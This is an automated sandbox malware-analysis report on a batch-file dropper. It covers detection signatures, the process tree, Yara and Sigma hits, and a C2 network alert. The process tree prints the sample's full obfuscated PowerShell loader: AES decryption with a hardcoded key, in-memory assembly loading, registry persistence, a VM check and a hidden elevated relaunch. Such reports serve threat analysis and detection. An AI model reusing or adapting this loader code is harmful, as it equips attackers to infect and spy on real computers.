
Windows Analysis Report
skf7iF4.bat

Overview

General Information

Sample name: skf7iF4.bat
Analysis ID: 1631966
MD5: 7b05eb7fc87326bd6bb95aca0089150d
SHA1: cbb811467a778fa329687a1afd2243fdc2c78e5a
SHA256: c0b082bae70e899007157ffc0267d41b7d80d6c42ee6f71a8c052cd9517cb845
Tags: bat, user-aachum

Detection

Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell decrypt and execute
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Found large BAT file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Suspicious powershell command line found
Writes to foreign memory regions
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 6300 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skf7iF4.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6440 cmdline: powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\skf7iF4.bat' -ArgumentList 'sgcCUaUFtA' -WindowStyle Hidden -Verb RunAs" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 3568 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\Desktop\skf7iF4.bat" sgcCUaUFtA MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6304 cmdline: powershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • findstr.exe (PID: 6548 cmdline: "C:\Windows\system32\findstr.exe" /i WDS100T2B0A MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • cmd.exe (PID: 4012 cmdline: cmd.exe /c echo function ixMY($RTJl){ Invoke-Expression -Verbose '$lYya=[kQSkQykQstkQekQm.kQSkQekQckQukQrkQikQtkQykQ.kQCrkQykQpkQtokQgrkQakQphkQykQ.kQAekQskQ]:kQ:CkQrkQekQakQtekQ(kQ);'.Replace('kQ', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore -Verbose '$lYya.M7ko7kd7ke=7k[7kSy7ks7kt7ke7km7k.7kS7ke7kc7ku7kri7kt7ky7k.C7kry7kp7kto7kg7kr7kap7kh7ky.7kCi7kp7kh7ke7krM7ko7kd7ke]7k:7k:C7kB7kC;'.Replace('7k', ''); Invoke-Expression -InformationAction Ignore '$lYya.PUPaUPdUPdiUPnUPg=UP[UPSUPyUPsUPtUPeUPmUP.UPSUPecUPuUPrUPitUPy.UPCUPryUPpUPtUPogUPrUPapUPhyUP.UPPUPaUPddUPiUPnUPgMUPoUPdeUP]UP::UPPUPKUPCUPS7UP;'.Replace('UP', ''); Invoke-Expression -Verbose '$lYya.KF4eF4yF4=[F4SF4ysF4tF4eF4mF4.F4CF4oF4nF4vF4eF4rtF4]F4:F4:FF4roF4mF4BaF4sF4eF464F4SF4trF4inF4g("6F4iF4nF4QTF4VF4f6F4kF4MF4fF4iF4uF49F40F4mF4wF4KaF4ZF48F4tDF482F4BF4yTF4DF4CF4HNF4RF4PsF4BFF42F4gF4fF4mFF4QF4=");'.Replace('F4', ''); Invoke-Expression -Debug -Verbose -InformationAction Ignore -WarningAction Inquire '$lYya.IcuVcu=cu[Scuycustcuecumcu.cuCcuocuncuvcuecurcut]cu:cu:cuFrcuomcuBcuascuecu6cu4Scutcuricungcu("OcuQcufcuEscuocuBxcu6cufcuucuHcuocuGcu2cuocu+cubrcu8curcuQ=cu=");'.Replace('cu', ''); $kxIY=$lYya.CreateDecryptor(); $uoEQ=$kxIY.TransformFinalBlock($RTJl, 0, $RTJl.Length); $kxIY.Dispose(); $lYya.Dispose(); $uoEQ;}function eaLU($RTJl){ Invoke-Expression -Debug -Verbose -WarningAction Inquire -InformationAction Ignore '$QqUU=NgZegZwgZ-OgZbgZjegZcgZtgZ gZSgZygZsgZtgZegZmgZ.IgZOgZ.gZMegZmogZrgZySgZtgZrgZeagZm(,$RTJl);'.Replace('gZ', ''); Invoke-Expression -WarningAction Inquire '$JLmq=NgZegZwgZ-OgZbgZjegZcgZtgZ gZSgZygZsgZtgZegZmgZ.IgZOgZ.gZMegZmogZrgZySgZtgZrgZeagZm;'.Replace('gZ', ''); Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore '$FcOM=NJVeJVwJV-OJVbJVjeJVcJVtJV JVSJVyJVsJVtJVeJVmJV.IJVOJV.JVCoJVmpJVrJVesJVsJViJVonJV.JVGZJVipJVSJVtJVrJVeaJVmJV($QqUU, 
[JVIJVOJV.CJVoJVmpJVrJVeJVsJVsJViJVoJVnJV.JVCJVomJVpJVrJVesJVsiJVoJVnMJVoJVdJVe]JV:JV:DJVecJVoJVmJVpJVreJVsJVs);'.Replace('JV', ''); $FcOM.CopyTo($JLmq); $FcOM.Dispose(); $QqUU.Dispose(); $JLmq.Dispose(); $JLmq.ToArray();}function asdm($RTJl,$dnWr){ Invoke-Expression -InformationAction Ignore -Verbose -Debug '$UMjh=[imSimyimstimeimm.imRimeimfimlimeimcimtimiimoimn.imAimsimseimmbimlimy]im:im:imLoimaimd([byte[]]$RTJl);'.Replace('im', ''); Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire -Debug '$mtQH=$UMjh.EIAnIAtIAryIAPIAoiIAnIAtIA;'.Replace('IA', ''); Invoke-Expression -Verbose -InformationAction Ignore -WarningAction Inquire -Debug '$mtQH.7yI7yn7yvo7yk7ye(7y$7yn7yu7yl7yl7y, $dnWr);'.Replace('7y', '');}function rfR($wdZq){ $registryPath = 'HKLM:\SOFTWARE\OOhhhm='; if (Test-Path $registryPath) { Remove-ItemProperty -Path $registryPath -Name * -Force } else { New-Item -Path $registryPath -Force; } Set-ItemProperty -Path $registryPath -Name 'Map' -Value 'YgRcXRGuMxdAM;gxWdtVB;oXRuvWNbWmgoaX'; Set-ItemProperty -Path $registryPath -Name 'YgRcXRGuMxdAM' -Value $wdZq; Set-ItemProperty -Path $registryPath -Name 'gxWdtVB' -Value '6inQTVf6kMfiu90mwKaZ8tD82ByTDCHNRPsBF2gfmFQ='; Set-ItemProperty -Path $registryPath -Name 'oXRuvWNbWmgoaX' -Value 'OQfEsoBx6fuHoG2o+br8rQ==';}$CjAH = 'C:\Users\user\Desktop\skf7iF4.bat';$host.UI.RawUI.WindowTitle = $CjAH;$Qxzd=[System.IO.File]::ReadAllText($CjAH).Split([Environment]::NewLine);foreach ($yehF in $Qxzd) { if ($yehF.StartsWith('uVcLd')) { $PNRU=$yehF.Substring(5); break; }}rfR $PNRU;$wdZq=[string[]]$PNRU.Split('\');Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire -Verbose '$GcJ = eaLU (ixMY ([14C14o14nv14e14rt14]14:14:14F14r14o14m14B14a14se14614414St14ri14n14g($wdZq[0].Replace("#", "/").Replace("@", "A"))));'.Replace('14', '');Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire -Debug '$lpG = eaLU (ixMY 
([14C14o14nv14e14rt14]14:14:14F14r14o14m14B14a14se14614414St14ri14n14g($wdZq[1].Replace("#", "/").Replace("@", "A"))));'.Replace('14', '');Invoke-Expression -WarningAction Inquire -Verbose '$Yek = eaLU (ixMY ([14C14o14nv14e14rt14]14:14:14F14r14o14m14B14a14se14614414St14ri14n14g($wdZq[2].Replace("#", "/").Replace("@", "A"))));'.Replace('14', '');asdm $GcJ $null;asdm $lpG $null;asdm $Yek (,[string[]] ('sgcCUaUFtA')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 3316 cmdline: powershell.exe -WindowStyle Hidden -NoProfile MD5: 04029E121A0CFA5991749937DD22A1D9)
          • winlogon.exe (PID: 556 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
            • lsass.exe (PID: 632 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
              • svchost.exe (PID: 2536 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 928 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • dwm.exe (PID: 1000 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
            • svchost.exe (PID: 400 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 716 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 620 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1040 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1056 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1068 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1128 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1296 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1320 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1344 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1488 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1504 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1548 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1600 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1652 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1712 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1732 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1744 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1924 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1984 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1340 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1640 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1588 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 2012 cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 2092 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • spoolsv.exe (PID: 2220 cmdline: C:\Windows\System32\spoolsv.exe MD5: 0D4B1E3E4488E9BDC035F23E1F4FE22F)
        • more.com (PID: 6520 cmdline: more MD5: EDB3046610020EE614B5B81B0439895E)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000011.00000003.1497124336.000001B92983C000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
Process Memory Space: powershell.exe PID: 3316 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
    • 0x135bbf:$b2: ::FromBase64String(
    • 0x136267:$b2: ::FromBase64String(
    • 0x1362de:$b2: ::FromBase64String(
    • 0x1371e4:$b2: ::FromBase64String(
    • 0x19179:$s1: -join
    • 0x14193b:$s1: -join
    • 0x143fb8:$s1: -join
    • 0x1e115:$s3: Reverse
    • 0x159475:$s3: Reverse
    • 0x13bde:$s4: +=
    • 0x13c80:$s4: +=
    • 0x17398:$s4: +=
    • 0x18e4e:$s4: +=
    • 0x19064:$s4: +=
    • 0x1915b:$s4: +=
    • 0x13dbd6:$s4: +=
    • 0x13dbf5:$s4: +=
    • 0x13dc30:$s4: +=
    • 0x13dc4d:$s4: +=
    • 0x13dc88:$s4: +=
    • 0x13dcf4:$s4: +=
Process Memory Space: winlogon.exe PID: 556 | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security

Source | Rule | Description | Author | Strings
amsi64_3316.amsi.csv | JoeSecurity_PowershellDecryptAndExecute | Yara detected Powershell decrypt and execute | Joe Security

        System Summary

        Source: DNS query | Author: Brandon George (blog post), Thomas Patzke | Data: Image: C:\Windows\System32\svchost.exe, QueryName: ipwho.is
        Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: winlogon.exe, ParentImage: C:\Windows\System32\winlogon.exe, ParentProcessId: 556, ParentProcessName: winlogon.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 928, ProcessName: svchost.exe
        Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\skf7iF4.bat' -ArgumentList 'sgcCUaUFtA' -WindowStyle Hidden -Verb RunAs" , CommandLine: powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\skf7iF4.bat' -ArgumentList 'sgcCUaUFtA' -WindowStyle Hidden -Verb RunAs" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skf7iF4.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6300, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\skf7iF4.bat' -ArgumentList 'sgcCUaUFtA' -WindowStyle Hidden -Verb RunAs" , ProcessId: 6440, ProcessName: powershell.exe
        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2025-03-07T17:52:51.040316+0100 | 2035595 | 1 | Domain Observed Used for C2 Detected | 176.65.144.14 | 4567 | 192.168.2.6 | 49687 | TCP


        AV Detection

        Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.3% probability
        Source: unknown | HTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.6:49690 version: TLS 1.2
        Source: Binary string: kernel32.pdbUGP source: winlogon.exe, 00000011.00000003.1497625230.000001B927CE6000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: kernelbase.pdbUGP source: winlogon.exe, 00000011.00000003.1497124336.000001B92983C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 0000001A.00000000.1542720331.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2513139367.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000001A.00000000.1542678836.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2511742250.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: d.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001A.00000000.1542678836.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2511742250.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb0A5 source: svchost.exe, 0000001A.00000000.1542678836.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2511742250.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000001A.00000000.1542678836.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2511742250.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000001A.00000000.1542678836.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2511742250.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbcache source: svchost.exe, 0000001A.00000000.1542720331.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2513139367.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001A.00000000.1542720331.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2513139367.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ntdll.pdb source: winlogon.exe, 00000011.00000003.1496794921.000001B927CC5000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: kernel32.pdb source: winlogon.exe, 00000011.00000003.1497625230.000001B927CE6000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ntdll.pdbUGP source: winlogon.exe, 00000011.00000003.1496794921.000001B927CC5000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000001A.00000002.2510051300.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.1542643733.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000001A.00000002.2510051300.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.1542643733.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000001A.00000002.2510051300.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.1542643733.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000001A.00000002.2510051300.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.1542643733.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 0000001A.00000000.1542720331.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2513139367.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000001A.00000000.1542720331.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2513139367.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: kernelbase.pdb source: winlogon.exe, 00000011.00000003.1497124336.000001B92983C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001A.00000000.1542720331.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2513139367.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp
        Source: C:\Windows\System32\cmd.exe | Code function: 4_2_000001B780BEF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_000001B780BEF3E8
        Source: C:\Windows\System32\cmd.exe | Code function: 4_2_000001B780BEF264 FindFirstFileExW,4_2_000001B780BEF264
        Source: C:\Windows\System32\conhost.exe | Code function: 5_2_000002640732F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_000002640732F3E8
        Source: C:\Windows\System32\conhost.exe | Code function: 5_2_000002640732F264 FindFirstFileExW,5_2_000002640732F264
        Source: C:\Windows\System32\more.com | Code function: 16_2_00000234FE52F264 FindFirstFileExW,16_2_00000234FE52F264
        Source: C:\Windows\System32\more.com | Code function: 16_2_00000234FE52F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,16_2_00000234FE52F3E8
        Source: C:\Windows\System32\lsass.exe | Code function: 18_2_000002158AEEF264 FindFirstFileExW,18_2_000002158AEEF264
        Source: C:\Windows\System32\lsass.exe | Code function: 18_2_000002158AEEF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,18_2_000002158AEEF3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 19_2_000001E8A01AF264 FindFirstFileExW,19_2_000001E8A01AF264
        Source: C:\Windows\System32\svchost.exe | Code function: 19_2_000001E8A01AF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,19_2_000001E8A01AF3E8
        Source: C:\Windows\System32\dwm.exe | Code function: 20_2_000001F08894F264 FindFirstFileExW,20_2_000001F08894F264
        Source: C:\Windows\System32\dwm.exe | Code function: 20_2_000001F08894F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_000001F08894F3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 21_2_000001AC86F7F264 FindFirstFileExW,21_2_000001AC86F7F264
        Source: C:\Windows\System32\svchost.exe | Code function: 21_2_000001AC86F7F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_000001AC86F7F3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 22_2_0000014785FBF264 FindFirstFileExW,22_2_0000014785FBF264
        Source: C:\Windows\System32\svchost.exe | Code function: 22_2_0000014785FBF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,22_2_0000014785FBF3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 23_2_000001DC59D1F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,23_2_000001DC59D1F3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 23_2_000001DC59D1F264 FindFirstFileExW,23_2_000001DC59D1F264
        Source: C:\Windows\System32\svchost.exe | Code function: 24_2_0000016588BCF264 FindFirstFileExW,24_2_0000016588BCF264
        Source: C:\Windows\System32\svchost.exe | Code function: 24_2_0000016588BCF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,24_2_0000016588BCF3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 25_2_0000017A8D34F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,25_2_0000017A8D34F3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 25_2_0000017A8D34F264 FindFirstFileExW,25_2_0000017A8D34F264
        Source: C:\Windows\System32\svchost.exe | Code function: 26_2_000001F34D8BF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,26_2_000001F34D8BF3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 26_2_000001F34D8BF264 FindFirstFileExW,26_2_000001F34D8BF264
        Source: C:\Windows\System32\svchost.exe | Code function: 27_2_00000220C270F264 FindFirstFileExW,27_2_00000220C270F264
        Source: C:\Windows\System32\svchost.exe | Code function: 27_2_00000220C270F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,27_2_00000220C270F3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 28_2_0000025AF1E9F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,28_2_0000025AF1E9F3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 28_2_0000025AF1E9F264 FindFirstFileExW,28_2_0000025AF1E9F264
        Source: C:\Windows\System32\svchost.exe | Code function: 29_2_0000027BFFD3F264 FindFirstFileExW,29_2_0000027BFFD3F264
        Source: C:\Windows\System32\svchost.exe | Code function: 29_2_0000027BFFD3F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,29_2_0000027BFFD3F3E8
        Source: C:\Windows\System32\svchost.exe | Code function: 30_2_000001CEE059F264 FindFirstFileExW,30_2_000001CEE059F264
